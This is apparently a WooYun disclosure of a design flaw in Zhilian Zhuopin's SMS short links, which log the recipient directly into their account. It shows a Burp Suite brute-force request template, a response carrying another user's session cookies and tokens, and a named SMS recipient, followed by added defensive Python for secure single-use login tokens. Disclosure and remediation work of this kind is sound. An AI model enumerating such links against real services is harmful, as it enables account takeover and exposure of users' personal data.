
Zhilian Zhuopin design flaw: a single link logs into your account and allows arbitrary operations

2016-07-01 09:15

The story begins with an SMS.



Code:

[Zhilian Zhuopin] Hello Cai Guangna, I am a Zhuopin headhunting consultant and have an art position opportunity for you; click t.highpin.cn/m/c3Wec. Reply T to unsubscribe.

Visiting t.highpin.cn/m/c3Wec directly logs you straight into that account.

[screenshot: zl.JPG]

Brute-forcing the last two characters of the code with Burp Suite: 3844 requests, of which 101 were valid hits (every response with a length greater than 1000 carries a session in the response body).



Code:

GET /m/c3W§e1§ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: t.highpin.cn







[screenshot: zl0.JPG]









Code:

HTTP/1.1 302 Found
Server: Tengine
Date: Mon, 16 May 2016 06:34:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 306
Connection: close
Cache-Control: private
Location: http://m.highpin.cn/Job/SearchList?KeyScope=1&Key=&JobLocation=&Industry=&JobType=&fromtype=767&type=1&l=t&code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758
Set-Cookie: SeekerInfo=UserName=566D02360367543707355F6D063600675D370635556D7&UserID=5E6D0F3603675F370235516D7&CID=C0E4F42495631542778490438&NameCN=%e5%bc%a0%e8%b6%85; domain=highpin.cn; path=/
Set-Cookie: UserStatus=UserStatus=556D073604675B371B35576D023618675C370035476D0636016757370535536D0D36056754377; domain=highpin.cn; path=/
Set-Cookie: SeekerChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/
Set-Cookie: SeekerMSiteChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/
Set-Cookie: route=72c625c1ad8094466eb6767d84faf89f;Path=/
Set-Cookie: NSC_ijhiqjo-172.19.0.190=ffffffffaf1b1cd845525d5f4f58455e445a4a423660;expires=Mon, 16-May-2016 06:40:15 GMT;path=/;httponly

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://m.highpin.cn/Job/SearchList?KeyScope=1&amp;Key=&amp;JobLocation=&amp;Industry=&amp;JobType=&amp;fromtype=767&amp;type=1&amp;l=t&amp;code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758">here</a>.</h2>
</body></html>









[screenshot: zl2.JPG]

Proof of vulnerability:

As described above.

Fix:

As described above.
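The root cause above is that a short code whose last two alphanumeric characters are guessable (62 symbols, so 62² = 3844 candidates) directly mints a logged-in session. As an added example that is not from the original report or from Zhuopin, the Python below contrasts that keyspace with a hypothetical `MagicLinkStore` that issues a 256-bit random token, stores only its SHA-256 digest, binds it to one user, and makes it expire and work only once; the class and method names are invented for this illustration. The simplest fix, not shown, is for the SMS link to only open the job listing and leave login to the normal flow.

```python
import hashlib
import secrets
import string
import time
from dataclasses import dataclass
from typing import Dict, Optional

# Alphabet of the report's short code (/m/c3Wec): 62 symbols, so 62**2 == 3844.
SHORT_ALPHABET = string.ascii_letters + string.digits

def guessable_keyspace(unknown_chars: int, alphabet: str = SHORT_ALPHABET) -> int:
    """Candidates to try when only the last `unknown_chars` of a code are unknown."""
    return len(alphabet) ** unknown_chars

@dataclass
class LoginLink:
    user_id: str
    expires_at: float
    used: bool = False

class MagicLinkStore:
    """Hypothetical login-link issuer: 256-bit random token, stored only as a
    SHA-256 digest, bound to one user, short-lived and single-use."""

    def __init__(self, ttl_seconds: int = 900):
        self.ttl = ttl_seconds
        self._links: Dict[bytes, LoginLink] = {}

    @staticmethod
    def _digest(token: str) -> bytes:
        return hashlib.sha256(token.encode()).digest()

    def issue(self, user_id: str, now: Optional[float] = None) -> str:
        """Mint a token for user_id; only its digest is kept server-side."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 43 URL-safe chars, 256 bits of entropy
        self._links[self._digest(token)] = LoginLink(user_id, now + self.ttl)
        return token

    def redeem(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the bound user_id once; None for unknown, reused or expired tokens."""
        now = time.time() if now is None else now
        link = self._links.get(self._digest(token))
        if link is None or link.used or now > link.expires_at:
            return None
        link.used = True  # a replayed or second click yields no session
        return link.user_id
```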

Source: www.wooyun.org/bugs/wooyun-2016-0209297
